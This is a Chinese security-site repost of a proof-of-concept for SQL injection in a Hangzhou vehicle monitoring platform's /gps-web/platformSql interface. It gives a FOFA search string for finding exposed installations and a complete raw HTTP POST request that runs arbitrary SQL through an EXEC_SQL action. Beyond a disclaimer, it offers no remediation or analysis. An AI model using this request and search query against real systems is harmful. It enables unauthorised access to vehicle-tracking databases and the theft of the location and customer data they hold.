杭州三一谦成科技车辆监控服务平台 platformSql SQL注入漏洞 poc

admin

145248
文章

119
评论

2025年6月4日09:02:15评论22 views字数 589阅读1分57秒阅读模式

漏洞描述：

杭州三一谦成科技车辆监控服务平台接口 /gps-web/platformSql 存在SQL 注入漏洞。

影响版本：

杭州三一谦成科技车辆监控服务平台

FOFA:

body="gps-web" && title="欢迎光临"

POC：

POST /gps-web/platformSql HTTP/1.1Host: Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Accept-Encoding: gzip, deflateAccept: */* Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 74action=EXEC_SQL&params=SELECT schema_name FROM information_schema.schemata

成功进行数据查询

杭州三一谦成科技车辆监控服务平台 platformSql SQL注入漏洞 poc

--------

原文始发于微信公众号（HK安全小屋）：杭州三一谦成科技车辆监控服务平台 platformSql SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

HUAWEI HG659任意文件读取漏洞

漏洞通告 | Gogs远程命令注入漏洞

CVE-2025-33053 网络快捷方式文件远程代码执行漏洞

CVE-2025-33073：域内大杀器（附复现环境）

Notepad++ v8.8.1安装程序特权提升漏洞 (CVE-2025-49144)

【AI高危漏洞预警】langchain-ai信息泄露漏洞(CVE-2025-2828)

Notepad++ 存严重提权漏洞,PoC 已流出

Apache Tomcat 命令执行漏洞（CVE-2025-24813)

F5 BIG-IP RCE：重温解析差异导致的身份认证绕过

【AI高危漏洞】MCP Inspector未授权访问致代码执行漏洞（CVE-2025-49596）

本文由 admin 发表于 2025年6月4日09:02:15
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
杭州三一谦成科技车辆监控服务平台 platformSql SQL注入漏洞 pochttps://cn-sec.com/archives/4129515.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.